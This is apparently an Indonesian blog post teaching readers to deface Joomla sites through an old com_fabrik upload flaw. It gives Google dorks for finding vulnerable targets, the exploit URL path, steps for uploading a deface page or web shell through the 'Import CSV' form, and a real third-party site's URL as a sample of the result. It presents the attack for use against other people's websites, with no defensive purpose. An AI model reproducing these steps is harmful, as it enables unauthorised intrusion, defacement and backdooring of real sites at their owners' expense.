Kali ini saya cuma mau berbagi saja tentang Exploit Joomla.
Ini sebenarnya bug lama, Namun ternyata sampai sekarang masih ada saja situs yang vuln dengan bug ini. Tentu saja dengan kesabaran dalam mencari target dan kepandaian mengolah google dork.
Sebelumnya sedikit Nasihat dari saya :
"Tidak semua website bisa dengan teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"
Oke, langsung saja ^_^
Google Dork :
inurl:viewTable?cid= site:com
*Site boleh kamu ganti apa saja~ Contoh: ru /it /il /za /pl dll ^_^
Atau ~
index.php?option=com_fabrik
[ dork dikreasikan sendiri.ya, pemalas gak bakalan sukses loh ^_^ ]
Setelah web dibuka, maka akan muncul
"Sorry this form is not publish".
Kemudian kamu masukan exploit ini :
index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
Nah udah muncul tuh Bugnya :D
Kalian tinggal Klik "Telusuri"
Terus pilih script deface kamu, dan Klik "Import CSV" Untuk Mengupload ~
Terus pilih script deface kamu, dan Klik "Import CSV" Untuk Mengupload ~
meskipun nanti ada bacaan
"Sorry the following fields in the CSV File are not found in this table:"
seperti error tapi file kamu udh keupload ^_^
bahkan kamu bisa upload shell , next lalu buka hasil deface'an kamu
bahkan kamu bisa upload shell , next lalu buka hasil deface'an kamu
http://www.tavolinihifi.it/media/namafilekamu.html
Munculah Script Deface kesayangan kamu >.<
*Kalau Tidak muncul berarti web tersebut tidak mendukung format html maupun php atau bisa saja FF :v *
Content Creator : Syahrul Ramadhan
0 comments:
Post a Comment